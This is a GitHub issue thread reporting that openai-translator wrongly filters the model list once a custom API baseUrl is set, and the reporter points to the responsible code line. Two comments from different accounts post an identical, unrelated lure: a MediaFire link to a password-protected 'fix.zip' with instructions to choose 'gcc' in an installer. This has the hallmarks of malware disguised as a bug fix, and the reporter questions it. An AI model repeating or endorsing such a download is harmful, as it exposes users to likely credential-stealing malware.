### ISSUE TITLE
[Bug] 自定义 baseUrl 之后从 /v1/models 获取模型列表会错误过滤模型

### ISSUE THREAD

**Issue by rxliuli** [openai-translator/openai-translator#1664]
### Please search before asking

- [X] I searched in the [issues](https://github.com/yetone/openai-translator/issues) and found nothing similar.

### Please read README

- [X] I have read the troubleshooting section in the README in detail.

### Please check your network and OpenAI API quota

- [X] I am sure it is not a network issue or an OpenAI API quota issue.

### OpenAI Translator version

v0.4.32

### Model name

OpenAI

### 系统/浏览器版本 System/Browser version

macOS 14.4.1

### 复现步骤 Reproduce step

1. 使用 OpenAI
2. 设置 API URL
  <img width="1269" alt="image" src="https://github.com/user-attachments/assets/36510988-4ecf-4b61-8d6c-6e73a9f687d2">
3. 可以看到模型列表中没有 OpenAI 兼容服务的模型列表
<img width="1269" alt="image" src="https://github.com/user-attachments/assets/eda0529e-d1e8-4a39-a162-e897478be537">

### 你看到了什么错误？What errors do you see?

具体来说是这行代码
https://github.com/openai-translator/openai-translator/blob/3ad09c2f7e97d43b10bdecc0160a33b5f87b3e5f/src/common/engines/abstract-openai.ts#L51

如果注释掉就可以看到了
<img width="1269" alt="image" src="https://github.com/user-attachments/assets/e84f8de7-661a-4eb5-a5fa-5c13c8b05946">

### 你期望看到什么？What did you expect to see?

不应该错误的过滤模型

### 你是否愿意提交一份 PR 来修改这个错误？Are you willing to submit a PR?

- [X] 我愿意提供 PR! I'm willing to submit a PR!

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rxliuli** [comment]
@管理员 上面是什么？
